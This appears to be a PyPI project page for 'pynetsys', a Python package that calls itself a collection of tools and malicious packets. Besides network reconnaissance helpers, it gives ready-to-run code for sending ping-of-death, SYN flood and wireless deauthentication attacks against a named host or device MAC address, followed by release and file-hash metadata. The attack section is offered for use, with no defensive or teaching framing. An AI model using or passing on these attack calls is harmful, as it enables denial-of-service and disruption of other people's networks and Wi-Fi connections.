pynetsys is a collection of tools and malicious packets.
Project description
PYNETSYS
pynetsys is a collection of tools and malicious packets..
Developed by Andrea Vaccaro from ANDRVV (c) 2022
Installing
Linux, MacOS = pip3 install pynetsys --user
Windows = pip install pynetsys --user
Tools
import pynetsys
trace = pynetsys.tool.traceroute("python.org") --> list
print(trace)
arping = pynetsys.tool.arp() --> dict
print(arping)
hostinfo = pynetsys.tool.hostlookup("python.org") --> dict
print(hostinfo)
networks = pynetsys.tool.networkFinder() --> dict
print(hostinfo)
Create malicious packet and send
import pynetsys
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.DEATH_PING)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "example.org", attack = Packets.SYN_FLOOD)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
PACKET, ID = pynetsys.packet.packet(target = "aa:bb:cc:dd:ee:ff", attack = Packets.WIRELESS_DEAUTH)
pynetsys.packet.start(PACKET, ID, _verbose = 0)
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pynetsys-0.1.0.tar.gz
(9.4 kB
view details)
Built Distribution
File details
Details for the file pynetsys-0.1.0.tar.gz
.
File metadata
- Download URL: pynetsys-0.1.0.tar.gz
- Upload date:
- Size: 9.4 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.5
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 43616982eab6100cc956584dff3dc5dd803a8539a7ed7d98058568fd61ec7290 |
|
MD5 | dcbc2812601f89d79da0b41ba685202b |
|
BLAKE2b-256 | 48590e3f8eead2ab856b5473a43c4a3870698c3b9af3f31719e2afea3494694a |
File details
Details for the file pynetsys-0.1.0-py3-none-any.whl
.
File metadata
- Download URL: pynetsys-0.1.0-py3-none-any.whl
- Upload date:
- Size: 9.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/4.0.1 CPython/3.10.5
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 78a2eefb1a25ad21526927100b38f6355a217287faa860e4c7e862dc0ded74aa |
|
MD5 | ad25d6efa7520f46ac86e17002baa075 |
|
BLAKE2b-256 | 425ed73dab18d43c052056451b77e13f18c64530dc39da018bd1af79330700a5 |